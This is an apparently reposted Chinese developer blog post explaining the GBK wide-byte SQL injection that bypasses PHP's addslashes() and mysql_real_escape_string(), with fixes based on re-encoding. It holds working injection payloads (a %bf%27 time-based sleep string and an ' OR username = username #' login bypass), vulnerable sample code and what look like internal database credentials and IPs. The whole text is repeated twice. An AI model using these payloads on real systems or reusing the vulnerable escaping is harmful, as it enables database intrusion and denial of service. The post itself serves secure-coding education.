PHP字元編碼繞過漏洞--addslashes、mysql_real_escape漏洞
阿新 • • 發佈:2018-12-23
在上次活動開發過程中,有個程式寫了下面這樣的語句:
http://blog.csdn.net/zhuizhuziwo/article/details/8525789
結果掃描工具一掃描,發現問題來了,被掃除了SQL注入漏洞,而且還引發了整個資料表被鎖住(備註:見第二部分)
檢查安全中心掃描日誌發現:
當SQL輸入為:
name=41%bf%27%20or%20sleep%2810.10%29%3d0%20limit%201%23
的時候引發了SQL注入。
//這裡輸出:
string(98) "SELECT COUNT(lGid) AS total FROM tbRank WHERE `sName` LIKE '%41¿\\\' or sleep(10.10)=0 limit 1#%';"
根本原因是addslash對於字元%BF%27的漏洞。
該漏洞最早2006年被國外用來討論資料庫字符集設為GBK時,0xbf27本身不是一個有效的GBK字元,但經過 addslashes() 轉換後變為0xbf5c27,前面的0xbf5c是個有效的GBK字元,所以0xbf5c27會被當作一個字元0xbf5c和一個單引號來處理,結果漏洞就觸發了。
mysql_real_escape_string() 也存在相同的問題,只不過相比 addslashes() 它考慮到了用什麼字符集來處理,因此可以用相應的字符集來處理字元。
在MySQL中有兩種改變預設字符集的方法。
方法一:
改變mysql配置檔案my.cnf
[client]
default-character-set=GBK
方法二:
在建立連線時使用
CODE:
SET CHARACTER SET 'GBK'
例:mysql_query("SET CHARACTER SET 'gbk'", $c);或者
mysql_query(“SET NAMES ‘GBK’”, $c);
問題是方法二在改變字符集時mysql_real_escape_string() 並不知道而使用預設字符集處理從而造成和 addslashes() 一樣的漏洞(備註:這句話是摘抄的,我也沒看懂)
網路上查詢到有人說:
當mysql_real_escape_string檢測到的編碼方式跟client設定的編碼方式(big5/bgk)不一致時,mysql_real_escape_string跟addslashes是沒有區別的
比如
[client]
default-character-set=latin1
mysql_query("SET CHARACTER SET 'gbk'", $mysql_conn);
這種情況下mysql_real_escape_string 是基於 latin1工作的,是不安全的
[client]
default-character-set=gbk
mysql_query("SET CHARACTER SET 'gbk'", $mysql_conn);
這種情況下,mysql_real_escape_string 基於 gbk 工作,是正常的
但是,這裡我108、153上驗證的都不成功:
用12機器的php檔案在108機器mysql上,查詢到
在153連結測試環境CDB結點:
執行來自:
http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html的測試程式碼
<?php
//$c = mysql_connect("localhost", "user", "pass");
$c = mysql_connect("10.1.164.108", "oss", "oss_da");
mysql_select_db("a_jasonyeTest", $c);
//$c = mysql_connect("10.179.12.249:3332", "oss", "oss_da");
//mysql_select_db("dbGuild20120903jasonye", $c);
mysql_select_db("database", $c);
// change our character set
mysql_query("SET CHARACTER SET 'gbk'", $c);
// create demo table
mysql_query("CREATE TABLE users (
username VARCHAR(32) PRIMARY KEY,
password VARCHAR(32)
) CHARACTER SET 'GBK'", $c);
mysql_query("INSERT INTO users VALUES('foo','bar'), ('baz','test')", $c);
// now the exploit code
$_POST['username'] = chr(0xbf) . chr(0x27) . ' OR username = username #';
$_POST['password'] = 'anything';
// Proper escaping, we should be safe, right?
$user = mysql_real_escape_string($_POST['username'], $c);
$passwd = mysql_real_escape_string($_POST['password'], $c);
$sql = "SELECT * FROM users WHERE username = '{$user}' AND password = '{$passwd}'";
$res = mysql_query($sql, $c);
echo mysql_num_rows($res); // will print 2, indicating that we were able to fetch all records
?>
發現:都存在漏洞
縱觀以上兩種觸發漏洞的關鍵是addslashes()、mysql_real_escape_string()在Mysql配置為GBK時就可以觸發漏洞,
另外:mysql_real_escape_string在執行前,必須正確連線到Mysql才有效。
又有,上面產生漏洞的原因主是有GBK的特殊字元所引起的,因而,我們需要在進行addslashes或者mysql_real_escape之前,對輸入字串進行特殊處理一下。
$this->sName = $_GET['name'];
$this->sName=iconv('utf-8//IGNORE', 'gbk', $this->sName);
$this->sName=iconv('gbk//IGNORE', 'utf-8', $this->sName);
Iconv這種方式比較粗暴,對於不能識別的特殊字元之後的語句在153機器上會截斷不能識別的字元後面的內容:
如下:
string(32) "41縗' or sleep(10.10)=0 limit 1#"
string(2) "41"
或者用mb_convert_encoding這個方式
$tmp = mb_convert_encoding($_POST['username'], 'gbk','utf-8');
$_POST['username'] = mb_convert_encoding($tmp, 'utf-8', 'gbk');
這種方式會過濾掉不能識別的GBK字元。
這樣處理之後,使用addslashes就沒有問題拉。
後記,這裡不光是%bf,其它許多字元也可以造成同樣漏洞,大家可以自己做個測試的查下,這裡有zwell文章提到的一個分析
http://hackme.ntobjectives.com/sql_inject/login_addslashes.php
參考網頁:
http://www.cnblogs.com/Safe3/archive/2008/08/22/1274095.html
http://ar.newsmth.net/thread-1d64171197dd0d-1.html
第二部分:
SELECT COUNT(lGid) AS total FROM tbRank WHERE `sName` LIKE '%41¿\\\' or sleep(10.10)=0 limit 1#%
在上面SQL注入語句中,當count和SLEEP語句放在一塊後,會引發mysql程序在表的每條記錄上都sleep(n)秒,所以,如果如果表中有1000條記錄時就會sleep 1000*n秒。
而且這裡還會引起整個表的鎖表。
所以大家以後程式測試的時候一定要放在測試環境CDB結:6125_ieod_test_db 這個結點上
上先進行安全中心的掃描工具掃描後再發布到正式CDB結點上,否則有可能會引起其他問題
http://blog.csdn.net/zhuizhuziwo/article/details/8525789
- $sName = $_GET['name'];
- $sName = addslashes($sName);
- $sql = "SELECT COUNT(lGid) AS total FROM tbRank WHERE `sName` LIKE '%$sName%';";
- var_dump($sql);
- exit();
結果掃描工具一掃描,發現問題來了,被掃除了SQL注入漏洞,而且還引發了整個資料表被鎖住(備註:見第二部分)
檢查安全中心掃描日誌發現:
當SQL輸入為:
name=41%bf%27%20or%20sleep%2810.10%29%3d0%20limit%201%23
的時候引發了SQL注入。
//這裡輸出:
string(98) "SELECT COUNT(lGid) AS total FROM tbRank WHERE `sName` LIKE '%41¿\\\' or sleep(10.10)=0 limit 1#%';"
根本原因是addslash對於字元%BF%27的漏洞。
該漏洞最早2006年被國外用來討論資料庫字符集設為GBK時,0xbf27本身不是一個有效的GBK字元,但經過 addslashes() 轉換後變為0xbf5c27,前面的0xbf5c是個有效的GBK字元,所以0xbf5c27會被當作一個字元0xbf5c和一個單引號來處理,結果漏洞就觸發了。
mysql_real_escape_string() 也存在相同的問題,只不過相比 addslashes() 它考慮到了用什麼字符集來處理,因此可以用相應的字符集來處理字元。
在MySQL中有兩種改變預設字符集的方法。
方法一:
改變mysql配置檔案my.cnf
[client]
default-character-set=GBK
方法二:
在建立連線時使用
CODE:
SET CHARACTER SET 'GBK'
例:mysql_query("SET CHARACTER SET 'gbk'", $c);或者
mysql_query(“SET NAMES ‘GBK’”, $c);
問題是方法二在改變字符集時mysql_real_escape_string() 並不知道而使用預設字符集處理從而造成和 addslashes() 一樣的漏洞(備註:這句話是摘抄的,我也沒看懂)
網路上查詢到有人說:
當mysql_real_escape_string檢測到的編碼方式跟client設定的編碼方式(big5/bgk)不一致時,mysql_real_escape_string跟addslashes是沒有區別的
比如
[client]
default-character-set=latin1
mysql_query("SET CHARACTER SET 'gbk'", $mysql_conn);
這種情況下mysql_real_escape_string 是基於 latin1工作的,是不安全的
[client]
default-character-set=gbk
mysql_query("SET CHARACTER SET 'gbk'", $mysql_conn);
這種情況下,mysql_real_escape_string 基於 gbk 工作,是正常的
但是,這裡我108、153上驗證的都不成功:
用12機器的php檔案在108機器mysql上,查詢到
在153連結測試環境CDB結點:
執行來自:
http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html的測試程式碼
<?php
//$c = mysql_connect("localhost", "user", "pass");
$c = mysql_connect("10.1.164.108", "oss", "oss_da");
mysql_select_db("a_jasonyeTest", $c);
//$c = mysql_connect("10.179.12.249:3332", "oss", "oss_da");
//mysql_select_db("dbGuild20120903jasonye", $c);
mysql_select_db("database", $c);
// change our character set
mysql_query("SET CHARACTER SET 'gbk'", $c);
// create demo table
mysql_query("CREATE TABLE users (
username VARCHAR(32) PRIMARY KEY,
password VARCHAR(32)
) CHARACTER SET 'GBK'", $c);
mysql_query("INSERT INTO users VALUES('foo','bar'), ('baz','test')", $c);
// now the exploit code
$_POST['username'] = chr(0xbf) . chr(0x27) . ' OR username = username #';
$_POST['password'] = 'anything';
// Proper escaping, we should be safe, right?
$user = mysql_real_escape_string($_POST['username'], $c);
$passwd = mysql_real_escape_string($_POST['password'], $c);
$sql = "SELECT * FROM users WHERE username = '{$user}' AND password = '{$passwd}'";
$res = mysql_query($sql, $c);
echo mysql_num_rows($res); // will print 2, indicating that we were able to fetch all records
?>
發現:都存在漏洞
縱觀以上兩種觸發漏洞的關鍵是addslashes()、mysql_real_escape_string()在Mysql配置為GBK時就可以觸發漏洞,
另外:mysql_real_escape_string在執行前,必須正確連線到Mysql才有效。
又有,上面產生漏洞的原因主是有GBK的特殊字元所引起的,因而,我們需要在進行addslashes或者mysql_real_escape之前,對輸入字串進行特殊處理一下。
$this->sName = $_GET['name'];
$this->sName=iconv('utf-8//IGNORE', 'gbk', $this->sName);
$this->sName=iconv('gbk//IGNORE', 'utf-8', $this->sName);
Iconv這種方式比較粗暴,對於不能識別的特殊字元之後的語句在153機器上會截斷不能識別的字元後面的內容:
如下:
string(32) "41縗' or sleep(10.10)=0 limit 1#"
string(2) "41"
或者用mb_convert_encoding這個方式
$tmp = mb_convert_encoding($_POST['username'], 'gbk','utf-8');
$_POST['username'] = mb_convert_encoding($tmp, 'utf-8', 'gbk');
這種方式會過濾掉不能識別的GBK字元。
這樣處理之後,使用addslashes就沒有問題拉。
後記,這裡不光是%bf,其它許多字元也可以造成同樣漏洞,大家可以自己做個測試的查下,這裡有zwell文章提到的一個分析
http://hackme.ntobjectives.com/sql_inject/login_addslashes.php
參考網頁:
http://www.cnblogs.com/Safe3/archive/2008/08/22/1274095.html
http://ar.newsmth.net/thread-1d64171197dd0d-1.html
第二部分:
SELECT COUNT(lGid) AS total FROM tbRank WHERE `sName` LIKE '%41¿\\\' or sleep(10.10)=0 limit 1#%
在上面SQL注入語句中,當count和SLEEP語句放在一塊後,會引發mysql程序在表的每條記錄上都sleep(n)秒,所以,如果如果表中有1000條記錄時就會sleep 1000*n秒。
而且這裡還會引起整個表的鎖表。
所以大家以後程式測試的時候一定要放在測試環境CDB結:6125_ieod_test_db 這個結點上
上先進行安全中心的掃描工具掃描後再發布到正式CDB結點上,否則有可能會引起其他問題